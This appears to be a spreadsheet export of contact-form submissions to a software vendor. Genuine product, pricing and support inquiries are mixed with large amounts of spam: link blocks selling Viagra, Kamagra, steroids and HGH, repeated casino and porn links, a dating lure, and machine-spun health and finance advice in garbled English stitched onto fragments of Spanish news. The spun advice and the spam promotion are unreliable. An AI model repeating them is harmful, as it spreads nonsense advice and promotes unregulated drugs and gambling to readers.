[url=http://localdem.org/ergo360.asp?id=ergobaby%20360%20video]ergobaby%20360%20video[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=ergo%20baby%20carrier%20sydney]ergo%20baby%20carrier%20sydney[/url]_x000D_
 _x000D_
or los duetos del artista con cantantes de la talla de Pablo Albor&amp;aacute;n, Antonio Orozco, Bebe, Efecto Pasillo, David Otero, India Mart&amp;iacute;nez, Leire Mart&amp;iacute;nez o Marwan.Educaci&amp;oacute;n y sanidadEn educaci&amp;oacute;n, el acuerdo refleja un aumento desde el 1,5 hasta 2 ve. _x000D_
[url=http://martingibney.com/ergo360.asp?id=ergo%20weather%20cover]ergo%20weather%20cover[/url]_x000D_
 _x000D_
51'FaltaAntonio Luna (Eibar) ha recibido una falta en la zona defensiva.50 | GOL de Zurutuza [Real Sociedad], con el pie izquierdo, tras una jugada colectiva. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=baby%20bjorn%20miracle%20baby%20carrier]baby%20bjorn%20miracle%20baby%20carrier[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ugurevci.com/images/access.asp?k=331-Viagra-Pharmacie-Belgique-Kamagra-Jelly-Uk-Acheter-Levitra-Generique]Viagra Pharmacie Belgique[/url]_x000D_
 When you are about the have a lot but would like to commence video games, you do have a couple of mobile possibilities. For informal game playing cell phones are rather capable. If you are much more serious, all the key brands possess a transportable method with intriguing features that you can take._x000D_
  [url=http://www.bucakbm.com/images/get.asp?etk=96-Cialis-Preise-Deutschland-Cialis-Austria-Apotheke-Kamagra-Gel-Wirkung/]Cialis Preise Deutschland[/url]_x000D_
 If you suffer from asthma attack, you must stay away from being subjected to light up in your home, vehicle, or around your immediate region. When you know somebody that smokes, question that they can do this in the open air outside the asthmatic. Tobacco smoke can quickly set off someone that is experiencing asthma attack to get an attack, from only the smell getting about the people who smoke garments._x000D_
  [url=http://www.marines.com.tr/academia/simple.php?p=171-Kamagra-Biverkningar-Kamagra-Jelly-Tjejer-Viagra-100mg]Kamagra Biverkningar[/url]_x000D_
 Use organic mulches in blossom bed furniture. The mulch properly inhibits the development of weeds while adding important nourishment on the backyard garden. The compost also assists in h2o retention, so there is no need to normal water your blossoms as much. Furthermore, a mulched blossom bed or garden is very visual._x000D_
  [url=http://www.atraveladvisor.com/ckfinder/slider.asp?rota=364-GÃ©nÃ©rique-Levitra-Levitra-Bayer-France-Viagra-Generique-Pfizer]GÃ©nÃ©rique Levitra[/url]_x000D_
</t>
  </si>
  <si>
    <t>В настоящее время покупатели проявили большой интерес к новинке – живым цветам в стекле. Они прекрасно смотрятся на столе, на тумбочке, по внешнему виду ничем не отличаясь от обычных живых цветов, подробнее об этом читайте на сайте [url=http://tvoi-noski.ru]tvoi-noski.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.winneresportes.com.br/images/class.php?p=2]Cialis 10mg[/url]_x000D_
 Before signing on the dotted collection for a cash advance, seek advice from your nearby Better Company Bureau very first. Make certain the business you handle is trustworthy and goodies shoppers with respect. Most companies on the market are supplying cash advance companies an incredibly poor track record, and you also don't want to become a statistic._x000D_
  [url=http://www.wueschibo.de/wp-admin/lib.php?track=101]Kamagra Kaufen Preis[/url]_x000D_
 Usually do not stop trying in case the initial treatment method you attempt will not work. Give each and every treatment method a couple weeks prior to deciding to surrender and move on to the next treatment method. Discovering the right answer can take some time, but you will be happy you underwent this process._x000D_
  [url=http://www.fbloja.com.br/fonts/idk.asp?m=157]Viagra Forum[/url]_x000D_
 Working can help you really feel much better if you are suffering from ringing in the ears. This has been shown that normal physical activities, like working or running, may have a beneficial effect on the symptoms of tinnitus. Physical exercise also can majorly minimize the existence tension which can cause getting worse tinnitus._x000D_
  [url=http://www.metropolitanacional.com.br/images/company.php?bbl=84]Viagra 500[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">e enero de 2017P&amp;oacute;ngase en contacto conmigo si usted necesita alojamiento, concluye.edo y como adjuntos estuvieron Francisco Menacho, Matilde Valent&amp;iacute;n y Francisco Mart&amp;iacute;nez Aldama.Seg&amp;uacute;n Iceta, no hay crisis matrimonial entre el PSC y el PSOE, lo que hay a su juicio es puntos de discrepancia que hay que abordar. _x000D_
[url=http://localdem.org/ergo360.asp?id=tula%20sidekick]tula%20sidekick[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=pull%20behind%20bike%20child%20carrier]pull%20behind%20bike%20child%20carrier[/url]_x000D_
 _x000D_
pesar de la crisis econ&amp;oacute;mica, en Castilla y Le&amp;oacute;n se han creado un total de 660 empresas tecnol&amp;oacute;gicas en los &amp;uacute;ltimos siete a&amp;ntilde;os., por lo que el Ayuntamiento ha querido cuidar especialmente este a&amp;ntilde;o la ambientaci&amp;oacute;n y ha optado por imponer un mayor orden en la composici&amp;oacute;n del desfile. _x000D_
[url=http://martingibney.com/ergo360.asp?id=ergo%20baby%20carrying%20positions]ergo%20baby%20carrying%20positions[/url]_x000D_
 _x000D_
co Jenson Button (36 a&amp;ntilde;os) y el brasile&amp;ntilde;o Felipe Massa (35 a&amp;ntilde;os).La Ponferradina, en cambio, llega con un buen estado an&amp;iacute;mico a este choque. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=bundles%20of%20baby%20clothes%20for%20sale]bundles%20of%20baby%20clothes%20for%20sale[/url]_x000D_
</t>
  </si>
  <si>
    <t>is there generic viagra available in usa [url=http://jud10.org/]viagra generic teva cost comparison[/url] _x000D_
max viagra dosage recommendations [url=http://jud10.org/]viagra price drop as drug patent expires[/url] _x000D_
 _x000D_
viagra prices to drop &lt;a href="http://jud10.org/"&gt;viagra prices at walmart or sam s club&lt;/a&gt; _x000D_
dosage of viagra for women &lt;a href="http://jud10.org/"&gt;viagra commercial&lt;/a&gt;</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;best online casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Hi_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
Linda</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinogamelistus.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Want to buy a licenced copy.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.pknstavoren.nl/wp-content/session.php?xqxu=951-Primobolan-Depot-Manufacturer-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate]Primobolan Depot Manufacturer[/url]_x000D_
 It is possible to bring in new visitors to your online website by publishing on discussion boards inside your selected area of interest. Most community forums let back links in, possibly your unique area or on your profile, but read the regulations initially. Once you reply to the forums, make sure your comments are helpful. Answer questions, question relevant queries, be friendly enjoy yourself._x000D_
  [url=http://www.klmz.zapchast.net/libraries/important.php?images=Stanozolol-Illegal-In-Australia-Clomiphene-For-Men-Nandrolone-Wholesale-1062/]Stanozolol Illegal In Australia[/url]_x000D_
 Hemorrhoid alleviation is as shut because the nearest container of witch hazel. Witch hazel offers immediate respite from the discomfort and itchiness brought on by piles through its distinctive numbing quality. Although witch hazel is not always a secret cure for hemorrhoids, it does significantly relieve all those muscle tissues and gives them a chance to repair._x000D_
  [url=http://www.rccaringcomm.org/wp-content/down.php?xia=Clomid-Dosage-Anabolic-Steroid-Names-Testosterone-Injections-Ireland-363/]Clomid Dosage[/url]_x000D_
 With regards to controlling your major depression, make sure that you check out with other people you are aware of and rely on before making any life transforming judgements. This is important so that you will not make any decisions which you cannot change while not within the best state of mind._x000D_
  [url=http://svreliant.org/wp-content/kontakt.php?l=1035-Stanozolol-Australia,Mesterolone-Cycle,Primobolan-Powder-Conversion]Stanozolol Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
My company is a supplier to law enforcement agencies in Bangladesh. Bangladesh Police has a purchase notice for an Open Source Intelligence System Tool (OSINT). They need this tool to identify the details of a user of target IP. They call it IP trapper / IP locator._x000D_
I would like to request you to let me know if your company is interested to provide the system to Bangladesh Police. Regards</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ilkyuvamabc.com/Class/order.asp?man=412]igf-1 lr3 reddit[/url]_x000D_
 Real estate industry can go up and down, but industrial real estate inside a perfect area is most likely the proper thing to purchase whenever. It could be the right time to purchase it, since the market is straight down. This short article will help you to comprehend when it is a great time to get professional property._x000D_
  [url=http://www.horemansinterieur.be/Images/class.asp?WPID=98]Cialis Ohne Rezept[/url]_x000D_
 And also hardwearing . palms and mouth area active although seeking to give up smoking, maintain crunchy greens like green beans or celery available. These lower-calories treats is not going to only keep the fingers busy, nonetheless they will continuous your blood sugar and keep you from achieving for better-calories food products that might lead to weight gain._x000D_
  [url=http://www.mroverseas.in/ashish/power.asp?f=328-Levitra-Bayer-Prospecto-Cialis-Madrid-Sin-Receta-Viagra-Online-Contrareembolso]Levitra Bayer Prospecto[/url]_x000D_
 Try and keep hectic just as much as it is possible to when you are dealing with anxiousness. While meditating and deep breathing exercises are a good strategy, other items that help keep you nonproductive are not useful to you. Keeping yourself productive will keep your brain off of all stuff that are creating your emotions of anxiety._x000D_
  [url=http://www.wingerlis.se/content/hand.asp?human=135]Cialis Rezeptfrei Usa[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have got this link . I register myself  but still can’t access the online support resources which I really need  for migration from TD2 to TD6.3. _x000D_
_x000D_
Can you please look into the matter and revert._x000D_
_x000D_
Thanks_x000D_
_x000D_
s._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://seorussian.ru]seorussian.ru[/url] -  [url=http://seorussian.ru]Разработка сайтов[/url]  </t>
  </si>
  <si>
    <t>Looking to integrate  a fax solution into Netsmart EMR and to replace current fax machines</t>
  </si>
  <si>
    <t>Want to know if there is a template I can upload for new items. Do I have to add every new item one by one? I have a list of a 100 new items. Thank you.</t>
  </si>
  <si>
    <t>price of opentext</t>
  </si>
  <si>
    <t>На рынке спальных принадлежностей особое место занимают подушки и одеяла с натуральными наполнителями, в частности, подушки из овечьей шерсти. Этот природный материал еще с библейских времен используется человеком для изготовления одежды, бытовых и постельных принадлежностей. Читайте об этом подробнее на сайте [url=http://dettka.com]dettka.com[/url]</t>
  </si>
  <si>
    <t>Applying for senior project management position</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]online slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://casinogamelistus.com/]online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>[url=http://yoursexydream1.com/?u=r3nweky&amp;o=9hq2ucc]Find yourself a girl right now, click here[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.necmettinbatirel.org/css/power.asp?juse=23]Cialis Apotek[/url]_x000D_
 Take into account search engine optimization as a way to improve your web advertising. Search engine optimization permits you to benefit from keyword searches on sites like Google, bringing your webpage better to the peak of the outcomes for particular information. By doing this, you'll get to wider viewers and maximize your marketing expenses._x000D_
  [url=http://www.lechuzaturkiye.com/apk/box.asp?u=193]kigtropin hgh price in india[/url]_x000D_
 Allow for dialogue through your e-mail marketing information marketing campaign. Make inquiries of your members, or posit imagined provoking questions. The responses can certainly make readers think that they may be a part of a relationship as an alternative to marketing goals. The answers you get will help you know where you are proceeding proper, and you might learn beneficial information regarding your basic._x000D_
  [url=http://www.tazemakarna.com/base/yoke.asp?jay=71]Hygetropin 200iu Buy[/url]_x000D_
 One essential hint to remember when making an investment in industrial real-estate is to find a property with as much units as you are able to afford. This will be significant because your income ratio improves with the a lot more devices you are renting out. When you have to shell out a lot more in advance, your come back around the purchase will probably be very much increased._x000D_
  [url=http://www.adre-zen.com/back/frr.asp?pook=160]hygetropin yellow tops[/url]_x000D_
</t>
  </si>
  <si>
    <t>Our IT development team would like to understand the OpenText Solution to produce ADA compliant documents. Would like to understand the pricing model and see if Opentext has an API that can take in the text/content at real time and generate the ADA compliant document electronically. We would like to see a solution architecture document on openText.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.kevin-pedersen.com/Images/noob.asp?pook=166]buy kigtropin from china[/url]_x000D_
 Muscle development can be achieved with effort and time, however you also need the right kind of info and instruction. Let the tips on this page become the perfect guideline apply these people to your muscles constructing regiment and watch for final results. Remain patient and you will soon be some of those systems you used to jealousy.Get The Right Path Right Through To Fantastic Overall health Using These Nourishment Ideas_x000D_
  [url=http://www.yankiyazgan.com/uss/access.asp?tag=664-Viagra-Pharmacie-Sans-Ordonnance-Viagra-100mg-Effet-Viagra-En-Pharmacie-Francaise]Viagra Pharmacie Sans Ordonnance[/url]_x000D_
 In case your hair appears greasy, it is possible to remedy it easily after some talcum natural powder or cornstarch. Just pat a little bit from the powder or cornstarch over the oily parts. Let it sit for about five minutes then brush it out extensively using a all-natural bristle brush. The hair will look clean and whole._x000D_
  [url=http://www.nhatrangblueseatravel.com/Styles/Home/footer.asp?lang=390-Generic-Viagra-Uk-Buy-Cialis-Cialis-London]Generic Viagra Uk[/url]_x000D_
 As you can see, there are several rewards which a expectant mother could possibly get from the healthier exercise program. You will observe a change within your body, brain and mindset, as you become more robust and much healthier. As an extra, childbirth is easier for a woman who continues to be physically fit in pregnancy!How To Make A Dog Excellent Resident_x000D_
  [url=http://www.renksanati.com/css/made.asp?form=181]kigtropin blue tops[/url]_x000D_
</t>
  </si>
  <si>
    <t>I've like to share a request for proposal/information with you as we are in the process of evaluating and selecting a new CMS for ASH. Regards, -Michael</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My email in regards to discuss about updated Database from Law industry._x000D_
_x000D_
We have dataset of all kinds of job titles with various data fields such as CEOs, CFOs, CTOs, Attorney, Compliance Director, Senior Partners, Compliance Specialist, Practice Partners, Managing Directors, Contracts Administrator, Contracts Manager, Proposal Specialist, Regulatory Affairs Specialist, Paralegals, Barristers, IT Directors, Technology Advisors, Legal Secretary and many more from all kind of businesses._x000D_
_x000D_
Kindly let me know your needs such as Target industry, Target job titles &amp; Target geography so that we can provide you more details._x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Scarlett Frost</t>
  </si>
  <si>
    <t>Мой вк radik_y2014  скайп kruzzor _x000D_
Создаю крутые сайты любой сложности и копии лендингов _x000D_
Могу долго расписывать какой я молодец, сколько десятков лет у меня опыта в данной сфере, но я предпочитаю "воде" реальные факты.Поэтому хватит лирики, вот что я могу предложить: _x000D_
------------------------------------ _x000D_
1. Качество услуг на уровне ведущих компаний. _x000D_
--- _x000D_
2. Цены существенно ниже чем в компаниях (зачастую в разы). _x000D_
--- _x000D_
3. Постоянная доступность, готовность ответить на интересующие Вас вопросы (ну разве что не ночью), то есть не нужно писать письма и сутками ждать ответа. _x000D_
--- _x000D_
4. ГОТОВ ПРЕДОСТАВИТЬ ПОРТФОЛИО РЕАЛЬНЫХ РАБОТ. ПРОВЕРИТЬ МОЖНО ПРОСТО ПОЗВОНИВ ПО НОМЕРАМ, УКАЗАННЫМ НА САЙТАХ. _x000D_
--- _x000D_
5. Мой опыт работы в рекламном агентстве позволяет выделить ваш продукт среди конкурентов, что значительно повысит вашу прибыль от сайта в дальнейшем. _x000D_
--- _x000D_
6. Люблю креативить. Это можно увидеть в моих работах. _x000D_
--- _x000D_
7. При желании можно встретиться и побеседовать лично. _x000D_
--- _x000D_
8. Также могу предложить: SEO продвижение сайта, контекстную рекламу Я.Директ и SMM продвижение в социальных сетях _x000D_
--- _x000D_
Я надеюсь, что первоначальной информации достаточно, ЗВОНИТЕ ;) _x000D_
------------------------------------- _x000D_
Сайт-визитка, лендинг, лэндинг, landing page, интернет-магазин, портал, корпоративный сайт.</t>
  </si>
  <si>
    <t>Looking at Secure MFT solutions that are FIPS 140-2 and provide file acceleration</t>
  </si>
  <si>
    <t>Would like to chat about B2B integration surrounding EDI and fitting a Opentext solution to our needs.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.sk-technology.ru/Scripts/class.php?lty=159]Ansomone Hgh 2017[/url]_x000D_
 To quit using tobacco, you may want to take into consideration going through hypnotherapy. During the program, the counselor will place you in to a soothing, dreamlike express and inform you to never cigarette smoke. Also, she or he could recurring a number of factors for you to give up so that you have this in your head whenever you get out of bed._x000D_
  [url=http://www.nakanishisan.com.br/New/pear.asp?xc=289]Human Growth Hormone Uk Price[/url]_x000D_
 To have your kids considering liquid, get them to a fruit smoothie initial. Permit them to pick their selections of fruit so it will be more enjoyable and enable them to get involved. Then add some carrots, ice cubes and mix. Do not forget the straws! Drinking from your straw will make it a tad bit more fun for these people._x000D_
  [url=http://www.aveenamilk.com/img/green.asp?wws=110/]Cialis Pas Cher Belgique[/url]_x000D_
 Should you not need to be ingesting oily gravy for dinner a very important thing to complete is be sure to skim the maximum amount of extra fat as you can off the top rated when you are cooking food the gravy. Or delay until it is made and undertake it then should you neglect._x000D_
  [url=http://www.stardental.com.tr/en/paper.asp?use=176]Kamagra Gel 100[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I've seen that you own the domain Magellan dot com (it redirects to to opentext dot com). I'd be interested in purchasing it. My offer is three thousand dollars. Let me know what you think._x000D_
Best,_x000D_
Francesco. </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.gti-technology.com/js/utilities.asp?page=289]Kamagra Oral Jelly Femme[/url]_x000D_
 When formatting a blog it is vital that you retain the look clean and legible. You desire your audiences to take pleasure from the knowledge of looking at your blog site. A good way to produce a fantastic website design and style is always to decide on a gentle track record, ideally white colored, and choose text message which is a really darkish shade. This compare is likely to make it simple to your targeted traffic to easily read your every phrase._x000D_
  [url=http://www.studionovabornova.com/images/contact.asp?id=198-Achat-Kamagra-Oral-Jelly-Acheter-Cialis-En-Ligne-Viagra-GÃ©nÃ©rique-Teva]Achat Kamagra Oral Jelly[/url]_x000D_
 Monitor the weather conditions exterior. Weather conditions can cause several the opportunity to boost or eliminate an incredible picture. You may still get some very nice exterior photos over a cloudy time. Create your photos so that the grey sky is not really within the structure. Don't allow it stop you from taking wonderful pictures._x000D_
  [url=http://www.multimaq.net.br/but/book.asp?basketball=166]Ansomone Hgh Uk Muscle[/url]_x000D_
 In the course of hypersensitivity time of year, if you have pollen or vegetation allergic reactions, stay inside whenever you can. Usually do not wide open windows and rely on an air conditioner to cool off. Plant pollen moves within the atmosphere outside the house, so if you can avoid that, you ought to. You may decrease allergy symptoms by only keeping inside._x000D_
  [url=http://www.sozdanismanlik.com/atlas/error.asp?sayfa=318-Meilleur-Prix-Kamagra-Oral-Jelly-Cialis-Achat-En-Suisse-Viagra-Prix-France]Meilleur Prix Kamagra Oral Jelly[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To whom this may concern,_x000D_
My name is Mohamed Suhail, I have completed my studies in Computer Engineering (BE) from the University of Wollongong in Dubai, and currently awaiting my graduation. I am currently looking for any job or internship opportunities and I for this reason I would like to contact your company. I have experience in various programming languages and I am a very fast learner. I am keen to expand my skill sets wherever possible. If there are any vacancies for any fulltime or internship jobs available, please do contact me. I will also send my CV to you._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casinogamelistus.com/]cassino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games real money&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casinogamelistus.com/]slot game[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casinos online&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I would like to test your RecoStar OCR engine for usage in our Document Classification solution. Do you provide a trial version for test by developers?_x000D_
_x000D_
Kind regards,_x000D_
Radko Novakov</t>
  </si>
  <si>
    <t>Watch best porn videos for free &lt;a href=http://sex-filmen.de&gt;porno&lt;/a&gt;| _x000D_
A lot of good [b]porn movies[/b]   Watch now!</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
je me suis inscrite à deux reprises à l'innovation tour Paris du 10 avril mais je n'ai jamais reçu de confirmation._x000D_
Pouvez-vous me confirmer que mon inscription est bien valide?_x000D_
_x000D_
Merci d'avance_x000D_
Bien cordialement_x000D_
Hélène Fischer</t>
  </si>
  <si>
    <t xml:space="preserve">IGC does not work with Mapped Drive in windows. It provides the following types of error : 	_x000D_
error_x005F_x0020_0 CDL Error 23, Failed to load: Z:\input\goodwork.pdf error_x005F_x0020_1	Unable to load file: Z:\input\goodwork.pdf_x000D_
_x000D_
Here Z: is the mapped drive and I had provide the IGC job file with following params : _x000D_
source=Z:\input\goodwork.pdf_x000D_
target=Z:\output_x000D_
Other paramas have not been specified by me deliberately in this email/message._x000D_
</t>
  </si>
  <si>
    <t>g&amp;uacute;n la tasaci&amp;oacute;n aportada por los fiadores, su valor alcanza los 610.Sobre el primer punto, las FARC y el gGobierno intentan acordar las zonas en Colombia donde se conce.El alza de la venta a particulares ha sido m&amp;aacute;s discreta, pero aun as&amp;iacute; ha subido un 7,8. _x000D_
[url=http://localdem.org/ergo360.asp?id=ergobaby%20360%20side%20carry]ergobaby%20360%20side%20carry[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=sash%20carrier]sash%20carrier[/url]_x000D_
 _x000D_
y Broncano2La Guardia Civil detiene a ocho personas y desarticula un grupo criminal del alfoz de Le&amp;oacute;n dedicado al robo de veh&amp;iacute;culos3Herido por arma blanca un hombre tras ser apu&amp;ntilde;alado en la avenida de Asturias de Le&amp;oacute;n4Fallece de un infarto un senderista en Valde&amp;oacute;n tras esperar una hora asistencia sanitaria5El cura de Vilecha renuncia a su cargo tras las protestas de los vecinos6Silv&amp;aacute;n cede el testigo a Majo y cree que es el mejor candidato para el PP7Fervor por 'La Morenica'8El puzle m&amp;aacute;s grande del mundo se montar&amp;aacute; en Le&amp;oacute;n9Inditex abre la tienda Zara m&amp;aacute;s grande del mundo10Lydia Valent&amp;iacute;n, corona vitalicia12&amp;laquo;Bebamos una copina de Genar&amp;iacute;n&amp;raquo;3Gitanos, sin etiquetas1s://vimeo/2122191582Fervor y pasi?n3Fervor por 'La Morenica'4ACOM llega a Europa para gestionar la reactivaci?n econ?mica y social de las cuencas mineras5La guerra no ha terminado6El autismo y la eterna espera7Tattoo Mo-Gur, 20 a?os de arte en la piel8?Bebamos una copina de Genar?n?9La C?mara de Comercio de Astorga organiza una jornada de sensibilizaci?n y fomento de emprendimiento rural10Fallece de un infarto un senderista en Valde?n tras esperar una hora asistencia sanitariaTemasPSOE Partido Socialista Obrero Espa?ol, Le?n (Provincia), PonferradaTAGSpsoe,  denuncia,  paralisis,  ayuntamiento,  palacios,  leon,  ante,  ausencias,  secretariaDeja tu comentario.Desde el PP se muestran preocupados por las graves consecuencias que puede tener esta ilegali</t>
  </si>
  <si>
    <t xml:space="preserve">want to purchase Brava! Desktop 7.2 CXL in India ._x000D_
need a partner in india where I can purchase </t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinogamelistus.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Please provide an email address to which I can send a request for quote.</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casinogamelistus.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino games&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in how OpenText / Documentum can help us with Document Management. Interested in a demo, and pricing information. </t>
  </si>
  <si>
    <t>Product Demo for Captiva/ document management</t>
  </si>
  <si>
    <t>I am wanting to know how OpenText RightFax works and to see if it is something our organization could implement. I understand how faxes go out utilizing RightFax, but how does RightFax route incoming faxes?</t>
  </si>
  <si>
    <t>Would like pricing please for Open Text RightFax</t>
  </si>
  <si>
    <t>Our marketing dept is making branding changes and wants to use a font that is currently not available in the dropdown of Gupta Report Builder. Is there a way to add a font so that it may be selected?</t>
  </si>
  <si>
    <t>Looking for option to upgrade REDDOT version 9. Could you provide me some details on how the upgrade would happen and potential costs.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
We currently have an on prem FacSys server and send / receive over local telco lines.  We’re exploring what our options are for going with a hosted solution that would give us more DR capabilities for fax._x000D_
_x000D_
Is your fax product hosted, on prem, or a hybrid?_x000D_
Is there a cost per DID?  Per page send and receive?  Per account?_x000D_
Could a user send a fax without having a DID?_x000D_
How does a user send a fax with your product?_x000D_
Does an inbound fax come in as an email?_x000D_
Do you offer trials?_x000D_
Do users have to have any kind of software installed locally to send / receive a fax?_x000D_
_x000D_
We currently have around 200 users that can send a fax from their computer by printing to a FacSys printer or thru the FacSys client they have installed locally.  A little over half of those have fax DIDs so they could receive inbound faxes.  _x000D_
_x000D_
We use a product called ImageRight that users can send faxes out of.  The server has the fax client installed and uses that to send the fax thru FacSys.  The only fax solutions they have listed as options is FacSys, Zetafax, and Rightfax.  Just making sure the solution we pick is going to work with this._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking to automate our faxing service. _x000D_
_x000D_
We need the ability to send faxes over a relay from an automation service, and send internationally from that same service and manually via email. _x000D_
_x000D_
Would you mind providing pricing that I can forward to our upper management team please?_x000D_
_x000D_
Thanks,_x000D_
Odell</t>
  </si>
  <si>
    <t>Please provide a quotation for one license of Gupta Report Builder. I have an application using Siemens Quality Management System software which requires that I write .QRP files using Gupta Report Writer._x000D_
_x000D_
Thank you,_x000D_
Cheryl Brzezowski</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://casinogamelistus.com/]casino games slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;play casino games online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t xml:space="preserve">Blesa y Rato se sentar&amp;aacute;n en el banquillo por las black en septiembre.Carme Forcadell comparecer&amp;aacute; en calidad de imputada.Aunque el Consejo Nacional Electoral (CNE) prometi&amp;oacute; hoy que dar&amp;aacute; resultados definitivo. _x000D_
[url=http://localdem.org/ergo360.asp?id=top%20baby%20slings]top%20baby%20slings[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=moby%20sling%20hold]moby%20sling%20hold[/url]_x000D_
 _x000D_
itorio, en otras autonom&amp;iacute;as y en otros pa&amp;iacute;ses) ascendi&amp;oacute; entre enero y marzo de 2016 a 10.Mientras tanto est&amp;aacute; perdiendo toda la credibilidad y el r&amp;eacute;dito pol&amp;iacute;tico&amp;raquo;, explic&amp;oacute; entre los aplausos de su bancada. _x000D_
[url=http://martingibney.com/ergo360.asp?id=ergobaby%20four%20position%20360]ergobaby%20four%20position%20360[/url]_x000D_
 _x000D_
m&amp;aacute;s informaci&amp;oacute;nEl 'no penalti' que cambi&amp;oacute; la historiaEl Atl&amp;eacute;tico llega en un momento confuso.competici&amp;oacute;n, los leoneses del Trile&amp;oacute;n y los madrile&amp;ntilde;os del Trion, cayendo finalmente la victoria del lado madrile&amp;ntilde;o por un margen algo inferior al minuto. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=chicco%20hiking%20baby%20carrier]chicco%20hiking%20baby%20carrier[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am looking for information on how to obtain the latest version of OpenText Capture.</t>
  </si>
  <si>
    <t>Researching Rightfax 10.6 FP2 SR2 version JITC approved for the use with the US DoD as well as any supporting information for interfacing with the Avaya Communication Manager.</t>
  </si>
  <si>
    <t xml:space="preserve">Warranty coverage for non-functioning transmitter.  </t>
  </si>
  <si>
    <t>I am looking to confirm that Rightfax has a FIPS 140-2 cert.</t>
  </si>
  <si>
    <t xml:space="preserve">Prezados_x000D_
_x000D_
Favor retornar contato para tratativas comerciais._x000D_
_x000D_
Contratação imediata. Precisamos de uma análise de um termo e proposta._x000D_
_x000D_
Favor, ligar para 61 999625557_x000D_
_x000D_
 	Sandro Servino_x000D_
UTIC – Unidade de Tecnologia da Informação e Comunicação_x000D_
Fone: (55 61) 3348-7354_x000D_
SGAS 604/605 – Módulos 30 e 31 – Asa Sul – 70.200-645 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in the Open Text Fax Appliance.  </t>
  </si>
  <si>
    <t>We are looking to migrate an app from Documerge to Opentext Extreme product. Can you please  aadvise how OpenText can help? Does opentext has any case study?Can you please point me the right point of contact so I can work with him/her ?</t>
  </si>
  <si>
    <t>Request for Support access</t>
  </si>
  <si>
    <t>I have submitted a form and have called your Support but have had not response yet. Support took my information and the reason for me contacting them and told me that someone would call me back._x000D_
We want to start processing AEP invoices via EDI and need more information on what is required and the cost._x000D_
_x000D_
Regards_x000D_
Leana</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino games[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]kasino[/url] _x000D_
